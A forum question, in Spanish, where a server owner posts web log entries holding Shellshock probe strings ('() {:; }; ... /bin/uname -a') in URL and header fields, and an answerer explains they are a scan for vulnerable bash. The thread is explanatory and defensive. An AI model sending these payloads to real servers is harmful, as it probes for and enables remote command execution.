actividad de registro del servidor web extraño

1

He notado alguna actividad sospechosa en los registros de mi servidor web:

188.165.66.110 - - [20/Feb/2015:03:58:28 +0000] "GET /?x=()?x=()?x=()?x=() {:; }; echo Content-type:text/plain;echo;echo;echo M'expr 1330 + 7'H;/bin/uname -a;echo @ HTTP/1.0" 301 178 "() {:; }; echo Content-type:text/plain;echo;echo;echo M'expr 1330 + 7'H;/bin/uname -a;echo @" "() {:; }; echo Content-type:text/plain;echo;echo;echo M'expr 1330 + 7'H;/bin/uname -a;echo @"

188.165.66.110 - - [20/Feb/2015:03:58:23 +0000] "GET /?x=()?x=() {:; }; echo Content-type:text/plain;echo;echo;echo M'expr 1330 + 7'H;/bin/uname -a;echo @ HTTP/1.0" 301 178 "() {:; }; echo Content-type:text/plain;echo;echo;echo M'expr 1330 + 7'H;/bin/uname -a;echo @" "() {:; }; echo Content-type:text/plain;echo;echo;echo M'expr 1330 + 7'H;/bin/uname -a;echo @"

188.165.66.110 - - [20/Feb/2015:03:58:23 +0000] "GET /?x=()?x=()?x=() {:; }; echo Content-type:text/plain;echo;echo;echo M'expr 1330 + 7'H;/bin/uname -a;echo @ HTTP/1.0" 301 178 "() {:; }; echo Content-type:text/plain;echo;echo;echo M'expr 1330 + 7'H;/bin/uname -a;echo @" "() {:; }; echo Content-type:text/plain;echo;echo;echo M'expr 1330 + 7'H;/bin/uname -a;echo @"

188.165.66.110 - - [20/Feb/2015:03:58:17 +0000] "GET /?x=() {:; }; echo Content-type:text/plain;echo;echo;echo M'expr 1330 + 7'H;/bin/uname -a;echo @ HTTP/1.0" 301 178 "() {:; }; echo Content-type:text/plain;echo;echo;echo M'expr 1330 + 7'H;/bin/uname -a;echo @" "() {:; }; echo Content-type:text/plain;echo;echo;echo M'expr 1330 + 7'H;/bin/uname -a;echo @"

176.190.169.100 - - [19/Feb/2015:20:06:36 +0000] "\x9B9\x8C\x13s\xF2\xE2^T\x1BL\x07\xE8\x22\x1CY4\x91'\x0F\x0ELh\xDCXEeZ\x87\x8E/\x5C\x903\xEF\x1F\x07\xD9[J" 400 166 "-" "-"</code><br><br> <code>109.239.221.237 - - [19/Feb/2015:20:07:16 +0000] "6\x92@\x88u\xD3+/\xD2\xD2\xFE\x98\xF4C\xB3\x89\x04;\xA7\xF1U\xF8\xA5\x02\xD8\xA4\xCCK\x9F\xC6e\x11" 400 166 "-" "-"

¿Alguna idea de lo que estaba tratando de lograr aquí?

    
pregunta Paul 20.02.2015 - 19:39
fuente

1 respuesta

7

Este es un ataque conocido, Shellshock . En los servidores con un shell bash vulnerable, el atacante puede explotar una condición que ejecuta comandos de shell enviando una URL especialmente diseñada.

Básicamente, el atacante está escaneando su servidor para ver si es vulnerable a él. Si se encontró que su servidor era vulnerable, probablemente también vería que se envían algunos wget / curl en las URL.

    
respondido por el ThoriumBR 20.02.2015 - 19:50
fuente

Lea otras preguntas en las etiquetas